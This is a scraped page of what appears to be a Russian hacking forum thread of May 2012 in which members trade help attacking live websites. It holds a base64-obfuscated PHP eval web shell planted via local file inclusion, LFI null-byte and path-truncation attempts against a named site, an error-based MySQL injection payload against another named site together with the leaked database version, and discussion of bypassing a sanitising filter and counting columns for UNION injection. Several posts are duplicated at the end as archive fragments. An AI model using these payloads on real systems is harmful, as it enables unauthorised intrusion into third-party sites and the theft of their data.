Вопросы по уязвимостям - Страница 205

Betepok · 26.05.2012, 22:20

Цитата:

Сообщение от nomad

Есть локальный инклуд + phpinfo, использую скрипт https://rdot.org/forum/showpost.php?p=18024&postcount=11
Т.к. allow_url_fopen = off, "затащить" файл из-вне не могу. Решил записать скрипт вида

PHP код:


			
<? eval($_REQUEST[a]); ?>

, но при записи в файл остается только <? eval(); ?>
Почему так, и как можно это решить?

Попробуй так
<? eval(base64_decode("ZXZhbCgkX1JFUVVFU1RbYV0pOw")); ?>

Nightmare · 27.05.2012, 00:25

http://barifur.ru/index.php?m=/../../index.php%00
Инклуд... странный, нул байт вроде как фильтруется, но не привычным способом \0 а просто \ ставит... без нуля на конце, или может это не фильтрация вовсе, и потом с /././ так не получается никак ничё сделать.
В общем в данном случае можно что то придумать, или бесполезный LFI ?

Ereeee · 27.05.2012, 09:31

Цитата:

Сообщение от Nightmare

http://barifur.ru/index.php?m=/../../index.php%00
Инклуд... странный, нул байт вроде как фильтруется, но не привычным способом \0 а просто \ ставит... без нуля на конце, или может это не фильтрация вовсе, и потом с /././ так не получается никак ничё сделать.
В общем в данном случае можно что то придумать, или бесполезный LFI ?

Там просто mq=on. Пробывал ///[4096/// или ///[2048/// слешей?

Nightmare · 27.05.2012, 11:14

Цитата:

Сообщение от Ereeee

Там просто mq=on. Пробывал ///[4096/// или ///[2048/// слешей?

Не пробовал, а пытался попробовать, ибо данный способ у меня пока не сработал нигде, и мне не на что опираться, чтобы знать как выглядит успех.

boshin84 · 27.05.2012, 14:54

помогите со скл.

_http://reborn.ru/1'

в исходнике

Цитата:

Tigger · 27.05.2012, 15:47

http://reborn.ru/123'and(1)=(select*from(select(name_const(version( ),1)),name_const(version(),1))a)and(1)='1
mysql error: Duplicate column name '5.0.32-Debian_7etch1-log'

fail · 30.05.2012, 12:45

есть функция, используется для защиты от sql inj

PHP код:


			
function safe($var, $lower = true, $punkt = true)

{



    $var = trim(strip_tags($var));

    $var = preg_replace("/\s+/ms", "-", $var);

    $var = str_replace("/", "-", $var);



    if ($punkt)

        $var = preg_replace("/[^a-z0-9\_\-.]+/mi", "", $var);

    else

        $var = preg_replace("/[^a-z0-9\_\-]+/mi", "", $var);



    $var = preg_replace('#[\-]+#i', '-', $var);



    if ($lower)

        $var = strtolower($var);



    if (strlen($var) > 200) {



        $var = substr($var, 0, 200);



        if (($temp_max = strrpos($var, '-')))

            $var = substr($var, 0, $temp_max);



    }



    return $var;

}

2,3 аргумент идут по умолчанию, можно ли обойти этот фильтр как то ?

Boolean · 30.05.2012, 14:26

Цитата:

Сообщение от fail

есть функция, используется для защиты от sql inj

PHP код:


			
function safe($var, $lower = true, $punkt = true)

{



    $var = trim(strip_tags($var));

    $var = preg_replace("/\s+/ms", "-", $var);

    $var = str_replace("/", "-", $var);



    if ($punkt)

        $var = preg_replace("/[^a-z0-9\_\-.]+/mi", "", $var);

    else

        $var = preg_replace("/[^a-z0-9\_\-]+/mi", "", $var);



    $var = preg_replace('#[\-]+#i', '-', $var);



    if ($lower)

        $var = strtolower($var);



    if (strlen($var) > 200) {



        $var = substr($var, 0, 200);



        if (($temp_max = strrpos($var, '-')))

            $var = substr($var, 0, $temp_max);



    }



    return $var;

}

2,3 аргумент идут по умолчанию, можно ли обойти этот фильтр как то ?

Код:

preg_replace("/[^a-z0-9\_\-.]+/mi", "", $var);

Не оставляет шансов.

c0ncat · 30.05.2012, 14:38

Вопрос по SQLi.
Допустим имеем сайт:

Цитата:

http://site.com/index.php?id=1

И параметр id уязвим.

Начинаю крутить:

Цитата:

http://site.com/index.php?id=-1+order+by+1--
http://site.com/index.php?id=-1+order+by+100--
http://site.com/index.php?id=-1+order+by+1000--

Невозможно определить количество полей.
Как в таком случае поступить?

Boolean · 30.05.2012, 14:48

Цитата:

Сообщение от c0ncat

Невозможно определить количество полей.

Как вы это определили? Уверены, что запрос не многострочный?

30.05.2012, 12:45	#2047
fail Регистрация: 09.07.2010 Сообщений: 19 Репутация: 0	есть функция, используется для защиты от sql inj PHP код: function safe($var, $lower = true, $punkt = true) { $var = trim(strip_tags($var)); $var = preg_replace("/\s+/ms", "-", $var); $var = str_replace("/", "-", $var); if ($punkt) $var = preg_replace("/[^a-z0-9\_\-.]+/mi", "", $var); else $var = preg_replace("/[^a-z0-9\_\-]+/mi", "", $var); $var = preg_replace('#[\-]+#i', '-', $var); if ($lower) $var = strtolower($var); if (strlen($var) > 200) { $var = substr($var, 0, 200); if (($temp_max = strrpos($var, '-'))) $var = substr($var, 0, $temp_max); } return $var; } 2,3 аргумент идут по умолчанию, можно ли обойти этот фильтр как то ?

Опции темы	Поиск в этой теме
Версия для печати Отправить по электронной почте	Поиск в этой теме: Расширенный поиск
Опции просмотра
Линейный вид Комбинированный вид Древовидный вид

27.05.2012, 00:25	#2042
Nightmare Banned Регистрация: 06.07.2010 Сообщений: 162 Репутация: 10	http://barifur.ru/index.php?m=/../../index.php%00 Инклуд... странный, нул байт вроде как фильтруется, но не привычным способом \0 а просто \ ставит... без нуля на конце, или может это не фильтрация вовсе, и потом с /././ так не получается никак ничё сделать. В общем в данном случае можно что то придумать, или бесполезный LFI ?

27.05.2012, 15:47	#2046
Tigger Регистрация: 24.11.2010 Сообщений: 42 Репутация: 11	http://reborn.ru/123'and(1)=(selectfrom(select(name_const(version( ),1)),name_const(version(),1))a)and(1)='1 mysql error: Duplicate column name '5.0.32-Debian_7etch1-log*'